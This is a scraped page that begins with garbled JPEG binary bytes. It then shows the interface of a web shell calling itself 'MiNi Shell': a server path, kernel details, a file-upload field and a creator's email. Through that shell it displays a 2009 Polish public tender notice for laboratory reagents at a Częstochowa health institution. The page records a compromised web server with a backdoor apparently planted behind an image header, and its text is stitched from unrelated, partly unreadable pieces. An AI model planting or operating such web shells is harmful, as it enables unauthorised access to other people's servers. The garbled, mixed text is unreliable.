JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090421/114730-N-2009.html

<p class="kh_header"><b>Częstochowa: Dostawa odczynników i drobnego sprzętu jednorazowego dla Laboratorium Analityczno-bakteriologicznego, nr sprawy 1/ZP/D/2009</b><br>
<b>Numer ogłoszenia: 114730 - 2009; data zamieszczenia: 21.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zakład Opieki Zdrowotnej nad Matką, Dzieckiem i Młodzieżą , ul. Sobieskiego 7a, 42-200 Częstochowa, woj. śląskie, tel. 034 3606135, faks 034 3606135.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.republika.pl/wzoz_czestochowa</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników i drobnego sprzętu jednorazowego dla Laboratorium Analityczno-bakteriologicznego, nr sprawy 1/ZP/D/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiajacy dopuszcza możliwość składania ofert częściowych na jedną lub wiekszą liczbę zadań, których szczegółowy opis zawarty jest w części II SIWZ: opis przedmiotu zamówienia, który obejmuje 18 zadań: 
1 Przedmiot zamówienia w zakresie zadania nr 1 - Koagulologia.
Przedmiotem zamówienia są odczynniki do koagulologii z przeglądem technicznym koagulometru OPTIC- K 3002.
kod CPV 33696200-7
2 Przedmiot zamówienia w zakresie zadania nr 2 - Hematologia z autoryzowanym serwisem pogwarancyjnym aparatu Cobas Micros 60 OTB.
Przedmiotem zamówienia są odczynniki do Hematologii z autoryzowanym serwisem pogwarancyjnym  aparatu Cobas Micros 60 OTB
kod CPV  33696200-7
3 Przedmiot zamówienia w zakresie zadania nr 3 - Biochemia.
Przedmiotem zamówienia są odczynniki do Biochemii.
kod CPV 33696200-7
4 Przedmiot zamówienia w zakresie zadania nr 4  -  Analityka ogólna i barwniki do barwienia.
Przedmiotem  zamówienia są odczynniki do Analityki ogólnej.
kod CPV 33696200-7, 33694000-1
5 Przedmiot zamówienia w zakresie zadania nr 5  -  Laboratoryjny drobny sprzęt jednorazowy.
Przedmiotem zamówienia jest laboratoryjny drobny  sprzęt jednorazowy.
Kod CPV 33192500-7, 33793000-5  
6 Przedmiot zamówienia w zakresie zadania nr 6  -  Hormony z dzierżawą automatycznego analizatora i serwisem.
Przedmiotem zamówienia są odczynniki do badań hormonalnych z dzierżawą automatycznego analizatora do badań metodą imunochemiluminescencji i autoryzowanym serwisem.
kod CPV 33696200-7
7 Przedmiot zamówienia w zakresie zadania nr 7  -  Hemoglobina glikowana .
Przedmiotem zamówienia są testy do badań reflektometrem do pomiaru stężeń hemoglobiny glikowanej w systemie NycoCard Reader II.
kod CPV 33696200-7, 33192500-7,   33793000-5  
8 Przedmiot zamówienia w zakresie zadania nr 8 -  Krążki antybiogramowe.
Przedmiotem zamówienia są krążki antybiogramowe do oznaczania lekowrażliwości (wrażliwości drobnoustrojów na określone antybiotyki).
kod CPV 33694000-1, 33698100-0
9 Przedmiot zamówienia w zakresie zadania nr 9  -  Krążki mykogramowe.
Przedmiotem zamówienia są krążki mykogramowe do oznaczania wrażliwości grzybów na określone związki chemiczne.
kod CPV 33694000-1
10 Przedmiot zamówienia w zakresie zadania nr 10 -  Krążki diagnostyczne.
Przedmiotem zamówienia są krążki diagnostyczne do identyfikacji takich drobnoustrojów jak : Streptococus pneumoniae, Streptococus pyogenes, Haemophilus spp, Staphylococcus saprophiticus,Gardnella vaginalis.
kod CPV 33694000-1, 33698100-0
11 Przedmiot zamówienia w zakresie zadania nr 11 - Podłoża bakteriologiczne do oznaczania lekowrażliwości (płytki).
Przedmiotem  zamówienia są podłoża bakteriologiczne do oznaczania lekowrażliwości.  (wrażliwości drobnoustrojów na antybiotyki) - metoda przeglądowa.
kod CPV  33694000-1, 33698100-0
12 Przedmiot zamówienia w zakresie zadania nr 12 - Gotowe podłoża bakteriologiczne do identyfikacji (płytki).
Przedmiotem zamówienia sa gotowe podłoża bakteriologiczne do identyfikacji bakterii.
kod CPV  33694000-1, 33698100-0
13 Przedmiot zamówienia w zakresie zadania nr 13 - Testy do oznaczania lekowrażliwości grzybów.
Przedmiotem zamówienia są gotowe podłoża do hodowli grzybów i  identyfikacji bakterii.
kod CPV  33694000-1, 33698100-0
14 Przedmiot zamówienia w zakresie zadania nr 14 - Testy biochemiczne i odczynniki do identyfikacji bakteriologicznej z dzierżawą komputera.
Przedmiotem zamówienia są testy i odczynniki do identyfikacji bakteriologicznej (szczegółowa identyfikacja bakterii i grzybów - oznaczenie do gatunków).
kod CPV  33694000-1, 33698100-0
15 Przedmiot zamówienia w zakresie zadania nr 15  - Podłoża chromogenne i transportowe.
Przedmiotem zamówienia są podłoża wybiórcze chromogenne i transportowe.
kod CPV 33694000-1, 33698100-0
16 Przedmiot zamówienia w zakresie zadania nr 16 - Krążki diagnostyczne.
Przedmiotem zamówienia są krążki do identyfikacji.
kod CPV 33694000-1, 33698100-0
17 Przedmiot zamówienia w zakresie zadania nr 17 -  Testy lateksowe do identyfikacji bakteriologicznej.
Przedmiotem zamówienia są testy lateksowe do identyfikacji bakteriologicznej - identyfikacja paciorkowców grup: A,B,C,D,F,G , Streptococcus pneumoniae, Staphylococcus aureus..
kod CPV 33694000-1, 33698100-0
18 Przedmiot zamówienia w zakresie zadania nr 18  -  Podłoża sypkie.
Przedmiotem zamówienia są podłoża sypkie do hodowli, identyfikacji i lekowrażliwości bakterii i grzybów.
kod CPV 33694000-1, 33698100-0.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7, 33.19.25.00-7, 33.79.30.00-5, 33.69.40.00-1, 33.69.81.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> . O udzielenie zamówienia mogą ubiegać się  Wykonawcy potwierdzający spełnienie warunków:
1.1 posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 posiadający niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
      i osobami zdolnymi do wykonania zamówienia;
1.3 znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
2. Z ubiegania się o udzielenie  zamówienia publicznego wyklucza się Wykonawców, którzy:
2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych.
3. Zamawiający odrzuca ofertę jeżeli:
3.1 jest niezgodną z ustawą
3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
3.6 zawiera błędy w obliczeniu ceny 
3.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
3.8 jest nieważna na podstawie odrębnych przepisów, 
4. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą
5. Ocena spełnienia warunków udziału w postępowaniu wymagana od Wykonawców, zostanie dokonana na podstawie żądanych w pkt.6 niniejszego postępowania oświadczeń i dokumentów, metodą warunku granicznego - spełnia / niespełna.
6. Ocena ofert w zakresie poszczególnych zadań będzie niezależna od siebie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1 Wraz z wypełnionym i podpisanym przez Wykonawcę Formularzem ofertowym należy złożyć:
1.1 Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 24 ust. 1  i  2  ustawy  Prawa zamówień publicznych.  
1.2 Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art.. 22 ust. 1  pkt. 1-3 ustawy Prawa zamówień publicznych.    
1.3 Formularze cenowe w zakresie wybranych przez Wykonawcę zadań od 1 do 18 - wypełnione i podpisane przez Wykonawcę.
1.4 Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że dostawy lub usługi te zostały wykonane należycie - np. referencje min. 3 lub równoważnymi dokumentami.  
1.5 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.6 Koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym niniejszym zamówieniem publicznym.
1.7 Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia o wartości min. odpowiadającej wartości złożonej oferty.
1.8 Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
2 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 6.1.5 składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości oraz nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. 6.2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..   
4  Zasady  składania oferty przez podmioty występujące wspólnie :
4.1 Podmioty zobowiązane są do złożenia wraz z  ofertą  pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
4.2 Wymagane oświadczenia i dokumenty wskazane  w pkt. 6.1.1, 6.1.5 powinny być złożone przez każdy podmiot.
5 W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty: 
5.1 zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym - lub równoważne zaświadczenie wystawione przez podmiot mający siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego ( certyfikaty produktowe CE, ISO 9001, 13495 do wyrobów medycznych do diagnostyki in vitro,).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.republika.pl/wzoz_czestochowa.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zakład Opieki Zdrowotnej nad Matką, Dzieckiem i Młodzieżą, 42-200 Częstochowa, ul. Sobieskiego 7a.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 10:00, miejsce: Wojewódzki Zakład Opieki Zdrowotnej nad Matką, Dzieckiem i Młodzieżą
42-200 Częstochowa, ul. Sobieskiego 7a, pok. 308 (IIIp.).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com